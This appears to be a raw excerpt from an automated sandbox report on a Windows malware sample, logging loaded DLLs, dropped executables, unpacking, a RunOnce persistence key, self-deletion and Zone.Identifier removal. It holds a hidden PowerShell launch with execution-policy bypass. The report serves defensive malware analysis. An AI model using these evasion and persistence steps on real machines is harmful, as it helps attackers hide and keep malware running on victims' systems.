Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sashibt	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BitLockerToGo.pdb source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sashibt	Unpacked PE file: 4.2.sashibt.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sashibt	Unpacked PE file: 7.2.sashibt.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"			Jump to behavior

Source: file.exe	Static PE information: section name: .zowiz
Source: file.exe	Static PE information: section name: .jovusaj
Source: 7C81.exe.2.dr	Static PE information: section name: .xdata
Source: sashibt.2.dr	Static PE information: section name: .zowiz
Source: sashibt.2.dr	Static PE information: section name: .jovusaj

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403230 push eax; ret	0_2_00403302
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026FF push ecx; ret	0_2_0040270B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0255168F push esi; retf	0_2_025516BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02552766 push ecx; ret	0_2_02552772
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0271525B push edi; retf	0_2_02715266
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02715640 push ss; retf	0_2_02715612
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02715221 push edi; retf	0_2_02715266
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_027155FF push ss; retf	0_2_02715612
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_027169C7 pushad ; retf	0_2_02716A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_027169A8 pushad ; retf	0_2_02716A40
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_00403230 push eax; ret	4_2_00403302
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_004026FF push ecx; ret	4_2_0040270B
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_025E168F push esi; retf	4_2_025E16BC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_025E2766 push ecx; ret	4_2_025E2772
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_0264506B push edi; retf	4_2_02645076
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_02645450 push ss; retf	4_2_02645422
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_02645031 push edi; retf	4_2_02645076
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_0264540F push ss; retf	4_2_02645422
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_026467D7 pushad ; retf	4_2_02646850
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_0263D7AC pushad ; retf	4_2_0263D7AD
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_026467B8 pushad ; retf	4_2_02646850
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_00403230 push eax; ret	7_2_00403302
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_004026FF push ecx; ret	7_2_0040270B
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_025E168F push esi; retf	7_2_025E16BC
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_025E2766 push ecx; ret	7_2_025E2772
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_0266996F pushad ; retf	7_2_026699E8
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_02669950 pushad ; retf	7_2_026699E8
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_02668203 push edi; retf	7_2_0266820E
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_026685E8 push ss; retf	7_2_026685BA
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_026681C9 push edi; retf	7_2_0266820E
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_026685A7 push ss; retf	7_2_026685BA

Source: file.exe	Static PE information: section name: .text entropy: 7.7772612824669265
Source: sashibt.2.dr	Static PE information: section name: .text entropy: 7.7772612824669265

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sashibt	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7C81.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6E8A.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3530.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sashibt

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\explorer.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY

Jump to behavior

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\sashibt:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
